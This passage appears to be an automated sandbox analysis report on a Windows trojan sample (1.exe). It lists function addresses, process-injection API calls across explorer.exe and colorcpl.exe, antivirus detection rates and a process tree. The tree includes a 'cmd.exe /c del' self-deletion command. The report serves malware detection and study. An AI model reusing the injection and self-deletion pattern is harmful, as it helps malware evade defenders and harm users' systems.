Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E7A46	2_2_017E7A46
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DDAC6	2_2_017DDAC6
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CDAAC	2_2_017CDAAC
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01775AA0	2_2_01775AA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D1AA3	2_2_017D1AA3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E7D73	2_2_017E7D73
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E1D5A	2_2_017E1D5A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01733D40	2_2_01733D40
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174FDC0	2_2_0174FDC0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A9C32	2_2_017A9C32
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EFCF2	2_2_017EFCF2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EFF09	2_2_017EFF09
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_016F3FD5	2_2_016F3FD5
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_016F3FD2	2_2_016F3FD2
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EFFB1	2_2_017EFFB1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01731F92	2_2_01731F92
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01739EB0	2_2_01739EB0
Source: C:\Windows\explorer.exe	Code function: 3_2_103EE062	3_2_103EE062
Source: C:\Windows\explorer.exe	Code function: 3_2_103EC2FF	3_2_103EC2FF
Source: C:\Windows\explorer.exe	Code function: 3_2_103E98F9	3_2_103E98F9
Source: C:\Windows\explorer.exe	Code function: 3_2_103E9902	3_2_103E9902
Source: C:\Windows\explorer.exe	Code function: 3_2_103EC302	3_2_103EC302
Source: C:\Windows\explorer.exe	Code function: 3_2_103EA362	3_2_103EA362
Source: C:\Windows\explorer.exe	Code function: 3_2_103F05B2	3_2_103F05B2
Source: C:\Windows\explorer.exe	Code function: 3_2_103EF7C7	3_2_103EF7C7
Source: C:\Windows\explorer.exe	Code function: 3_2_109782FF	3_2_109782FF
Source: C:\Windows\explorer.exe	Code function: 3_2_109758F9	3_2_109758F9
Source: C:\Windows\explorer.exe	Code function: 3_2_1097A062	3_2_1097A062
Source: C:\Windows\explorer.exe	Code function: 3_2_1097C5B2	3_2_1097C5B2
Source: C:\Windows\explorer.exe	Code function: 3_2_1097B7C7	3_2_1097B7C7
Source: C:\Windows\explorer.exe	Code function: 3_2_10975902	3_2_10975902
Source: C:\Windows\explorer.exe	Code function: 3_2_10978302	3_2_10978302
Source: C:\Windows\explorer.exe	Code function: 3_2_10976362	3_2_10976362
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F0E4F6	4_2_04F0E4F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F12446	4_2_04F12446
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F04420	4_2_04F04420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F20591	4_2_04F20591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E60535	4_2_04E60535
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E7C6E0	4_2_04E7C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E5C7C0	4_2_04E5C7C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E60770	4_2_04E60770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E84750	4_2_04E84750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EF2000	4_2_04EF2000
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F181CC	4_2_04F181CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F141A2	4_2_04F141A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F201AA	4_2_04F201AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EE8158	4_2_04EE8158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E50100	4_2_04E50100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EFA118	4_2_04EFA118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EE02C0	4_2_04EE02C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F00274	4_2_04F00274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F203E6	4_2_04F203E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E6E3F0	4_2_04E6E3F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1A352	4_2_04F1A352
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E50CF2	4_2_04E50CF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F00CB5	4_2_04F00CB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E60C00	4_2_04E60C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E5ADE0	4_2_04E5ADE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E78DBF	4_2_04E78DBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E6AD00	4_2_04E6AD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EFCD1F	4_2_04EFCD1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1EEDB	4_2_04F1EEDB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1CE93	4_2_04F1CE93
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E72E90	4_2_04E72E90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E60E59	4_2_04E60E59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1EE26	4_2_04F1EE26
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E6CFE0	4_2_04E6CFE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E52FC8	4_2_04E52FC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EDEFA0	4_2_04EDEFA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04ED4F40	4_2_04ED4F40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F02F30	4_2_04F02F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EA2F28	4_2_04EA2F28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E80F30	4_2_04E80F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E8E8F0	4_2_04E8E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E468B8	4_2_04E468B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E62840	4_2_04E62840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E6A840	4_2_04E6A840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E629A0	4_2_04E629A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F2A9A6	4_2_04F2A9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E76962	4_2_04E76962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E5EA80	4_2_04E5EA80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F16BD7	4_2_04F16BD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1AB40	4_2_04F1AB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E51460	4_2_04E51460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1F43F	4_2_04F1F43F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F295C3	4_2_04F295C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EFD5B0	4_2_04EFD5B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F17571	4_2_04F17571
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F116CC	4_2_04F116CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EA5630	4_2_04EA5630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1F7B0	4_2_04F1F7B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1F0E0	4_2_04F1F0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F170E9	4_2_04F170E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E670C0	4_2_04E670C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F0F0CC	4_2_04F0F0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E6B1B0	4_2_04E6B1B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E9516C	4_2_04E9516C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E4F172	4_2_04E4F172
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F2B16B	4_2_04F2B16B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F012ED	4_2_04F012ED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E7B2C0	4_2_04E7B2C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E652A0	4_2_04E652A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EA739A	4_2_04EA739A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E4D34C	4_2_04E4D34C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1132D	4_2_04F1132D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1FCF2	4_2_04F1FCF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04ED9C32	4_2_04ED9C32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E7FDC0	4_2_04E7FDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F17D73	4_2_04F17D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E63D40	4_2_04E63D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F11D5A	4_2_04F11D5A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E69EB0	4_2_04E69EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E23FD2	4_2_04E23FD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E23FD5	4_2_04E23FD5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1FFB1	4_2_04F1FFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E61F92	4_2_04E61F92
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1FF09	4_2_04F1FF09
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E638E0	4_2_04E638E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04ECD800	4_2_04ECD800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E69950	4_2_04E69950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E7B950	4_2_04E7B950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EF5910	4_2_04EF5910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F0DAC6	4_2_04F0DAC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EFDAAC	4_2_04EFDAAC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04EA5AA0	4_2_04EA5AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F01AA3	4_2_04F01AA3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04ED3A6C	4_2_04ED3A6C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F17A46	4_2_04F17A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1FA49	4_2_04F1FA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E9DBF9	4_2_04E9DBF9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04ED5BF0	4_2_04ED5BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E7FB80	4_2_04E7FB80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04F1FB76	4_2_04F1FB76
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E3C5E0	4_2_02E3C5E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E22FB0	4_2_02E22FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E28C4B	4_2_02E28C4B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E28C50	4_2_02E28C50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E22D90	4_2_02E22D90

Source: C:\Users\user\Desktop\1.exe	Code function: String function: 017AF290 appears 105 times
Source: C:\Users\user\Desktop\1.exe	Code function: String function: 01777E54 appears 111 times
Source: C:\Users\user\Desktop\1.exe	Code function: String function: 0179EA12 appears 86 times
Source: C:\Users\user\Desktop\1.exe	Code function: String function: 0171B970 appears 280 times
Source: C:\Users\user\Desktop\1.exe	Code function: String function: 01765130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04E95130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04EDF290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04EA7E54 appears 111 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04ECEA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04E4B970 appears 280 times

Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_004181B0 NtCreateFile,	2_2_004181B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00418260 NtReadFile,	2_2_00418260
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_004182E0 NtClose,	2_2_004182E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_00418390 NtAllocateVirtualMemory,	2_2_00418390
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_004181AB NtCreateFile,	2_2_004181AB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0041838A NtAllocateVirtualMemory,	2_2_0041838A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762B60 NtClose,LdrInitializeThunk,	2_2_01762B60
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01762BF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762AD0 NtReadFile,LdrInitializeThunk,	2_2_01762AD0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_01762D30
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762D10 NtMapViewOfSection,LdrInitializeThunk,	2_2_01762D10
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01762DF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762DD0 NtDelayExecution,LdrInitializeThunk,	2_2_01762DD0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01762C70
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk,	2_2_01762CA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762F30 NtCreateSection,LdrInitializeThunk,	2_2_01762F30
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762FE0 NtCreateFile,LdrInitializeThunk,	2_2_01762FE0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762FB0 NtResumeThread,LdrInitializeThunk,	2_2_01762FB0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01762F90
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01762EA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk,	2_2_01762E80
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017635C0 NtCreateMutant,LdrInitializeThunk,	2_2_017635C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01764340 NtSetContextThread,	2_2_01764340
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01764650 NtSuspendThread,	2_2_01764650
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762BE0 NtQueryValueKey,	2_2_01762BE0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762BA0 NtEnumerateValueKey,	2_2_01762BA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762B80 NtQueryInformationFile,	2_2_01762B80
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762AF0 NtWriteFile,	2_2_01762AF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762AB0 NtWaitForSingleObject,	2_2_01762AB0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762D00 NtSetInformationFile,	2_2_01762D00
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762DB0 NtEnumerateKey,	2_2_01762DB0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762C60 NtCreateKey,	2_2_01762C60
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762C00 NtQueryInformationProcess,	2_2_01762C00
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762CF0 NtOpenProcess,	2_2_01762CF0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762CC0 NtQueryVirtualMemory,	2_2_01762CC0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762F60 NtCreateProcessEx,	2_2_01762F60
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762FA0 NtQuerySection,	2_2_01762FA0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762E30 NtWriteVirtualMemory,	2_2_01762E30
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01762EE0 NtQueueApcThread,	2_2_01762EE0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01763010 NtOpenDirectoryObject,	2_2_01763010
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01763090 NtSetValueKey,	2_2_01763090
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017639B0 NtGetContextThread,	2_2_017639B0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01763D70 NtOpenThread,	2_2_01763D70
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01763D10 NtOpenProcessToken,	2_2_01763D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04E92CA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92C60 NtCreateKey,LdrInitializeThunk,	4_2_04E92C60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04E92C70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04E92DF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92DD0 NtDelayExecution,LdrInitializeThunk,	4_2_04E92DD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_04E92D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_04E92EA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92FE0 NtCreateFile,LdrInitializeThunk,	4_2_04E92FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92F30 NtCreateSection,LdrInitializeThunk,	4_2_04E92F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92AD0 NtReadFile,LdrInitializeThunk,	4_2_04E92AD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_04E92BE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04E92BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92B60 NtClose,LdrInitializeThunk,	4_2_04E92B60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E935C0 NtCreateMutant,LdrInitializeThunk,	4_2_04E935C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E94650 NtSuspendThread,	4_2_04E94650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E94340 NtSetContextThread,	4_2_04E94340
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92CF0 NtOpenProcess,	4_2_04E92CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92CC0 NtQueryVirtualMemory,	4_2_04E92CC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92C00 NtQueryInformationProcess,	4_2_04E92C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92DB0 NtEnumerateKey,	4_2_04E92DB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92D30 NtUnmapViewOfSection,	4_2_04E92D30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92D00 NtSetInformationFile,	4_2_04E92D00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92EE0 NtQueueApcThread,	4_2_04E92EE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92E80 NtReadVirtualMemory,	4_2_04E92E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92E30 NtWriteVirtualMemory,	4_2_04E92E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92FA0 NtQuerySection,	4_2_04E92FA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92FB0 NtResumeThread,	4_2_04E92FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92F90 NtProtectVirtualMemory,	4_2_04E92F90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92F60 NtCreateProcessEx,	4_2_04E92F60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92AF0 NtWriteFile,	4_2_04E92AF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92AB0 NtWaitForSingleObject,	4_2_04E92AB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92BA0 NtEnumerateValueKey,	4_2_04E92BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E92B80 NtQueryInformationFile,	4_2_04E92B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E93090 NtSetValueKey,	4_2_04E93090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E93010 NtOpenDirectoryObject,	4_2_04E93010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E93D70 NtOpenThread,	4_2_04E93D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E93D10 NtOpenProcessToken,	4_2_04E93D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_04E939B0 NtGetContextThread,	4_2_04E939B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E382E0 NtClose,	4_2_02E382E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E38260 NtReadFile,	4_2_02E38260
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E38390 NtAllocateVirtualMemory,	4_2_02E38390
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E381B0 NtCreateFile,	4_2_02E381B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E3838A NtAllocateVirtualMemory,	4_2_02E3838A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4_2_02E381AB NtCreateFile,	4_2_02E381AB

Source: 1.exe, 00000000.00000002.2054404991.0000000046E00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs 1.exe
Source: 1.exe, 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGlaxoSmithKline.dll@ vs 1.exe
Source: 1.exe, 00000000.00000000.1985024133.0000000000992000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDuplicateWaitObjectException.exe< vs 1.exe
Source: 1.exe, 00000000.00000002.2038213764.0000000026A00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNT1.dll, vs 1.exe
Source: 1.exe, 00000000.00000002.2024194329.0000000006021000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNT1.dll, vs 1.exe
Source: 1.exe, 00000000.00000002.2019687463.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1.exe
Source: 1.exe, 00000002.00000002.2046273682.0000000001297000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs 1.exe
Source: 1.exe, 00000002.00000002.2046399747.0000000001523000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs 1.exe
Source: 1.exe, 00000002.00000002.2046479384.000000000181D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 1.exe
Source: 1.exe	Binary or memory string: OriginalFilenameDuplicateWaitObjectException.exe< vs 1.exe

Source: 1.exe	ReversingLabs: Detection: 92%
Source: 1.exe	Virustotal: Detection: 82%

Source: C:\Users\user\Desktop\1.exe

File read: C:\Users\user\Desktop\1.exe:Zone.Identifier

Jump to behavior

Source: 1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Users\user\Desktop\1.exe C:\Users\user\Desktop\1.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\1.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@303/1@37/4

Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.1.exe.46e00000.8.raw.unpack, ContextConfigurationAdapter.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
